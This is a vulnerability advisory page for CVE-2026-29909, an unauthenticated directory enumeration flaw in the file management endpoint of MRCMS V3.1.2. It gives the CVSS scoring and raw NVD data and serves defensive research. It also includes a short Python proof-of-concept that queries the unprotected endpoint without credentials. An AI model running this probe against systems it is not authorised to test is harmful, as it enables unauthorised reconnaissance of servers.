Security Vulnerability Report
中文
CVE-2026-29909 CVSS 5.3 MEDIUM

CVE-2026-29909

Published: 2026-03-30 17:16:16
Last Modified: 2026-04-02 17:11:01
Source: [email protected]

Description

MRCMS V3.1.2 contains an unauthenticated directory enumeration vulnerability in the file management module. The /admin/file/list.do endpoint lacks authentication controls and proper input validation, allowing remote attackers to enumerate directory contents on the server without any credentials.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:mrcms:mrcms:3.1.2:*:*:*:*:*:*:* - VULNERABLE
MRCMS V3.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def check_vulnerability(target_url): """ Checks for CVE-2026-29909 directory enumeration vulnerability. """ # The vulnerable endpoint identified in the CVE description endpoint = "/admin/file/list.do" full_url = f"{target_url}{endpoint}" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" } try: # Sending request without authentication cookies response = requests.get(full_url, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] Potential vulnerability detected at {full_url}") print(f"[+] Response content (first 200 chars): {response.text[:200]}") else: print(f"[-] Endpoint returned status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}") # Usage example # check_vulnerability("http://127.0.0.1:8080")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-29909", "sourceIdentifier": "[email protected]", "published": "2026-03-30T17:16:15.750", "lastModified": "2026-04-02T17:11:00.893", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MRCMS V3.1.2 contains an unauthenticated directory enumeration vulnerability in the file management module. The /admin/file/list.do endpoint lacks authentication controls and proper input validation, allowing remote attackers to enumerate directory contents on the server without any credentials."}, {"lang": "es", "value": "MRCMS V3.1.2 contiene una vulnerabilidad de enumeración de directorios no autenticada en el módulo de gestión de archivos. El endpoint /admin/file/list.do carece de controles de autenticación y de validación de entrada adecuada, lo que permite a atacantes remotos enumerar el contenido de los directorios en el servidor sin ninguna credencial."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-425"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mrcms:mrcms:3.1.2:*:*:*:*:*:*:*", "matchCriteriaId": "254B64CD-32D5-4E91-8A4C-54C155EA7E0B"}]}]}], "references": [{"url": "https://github.com/qflksheep/CVE-2026-29909-MRCMS-vulnerability/blob/main/README.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/wuweiit/mushroom", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.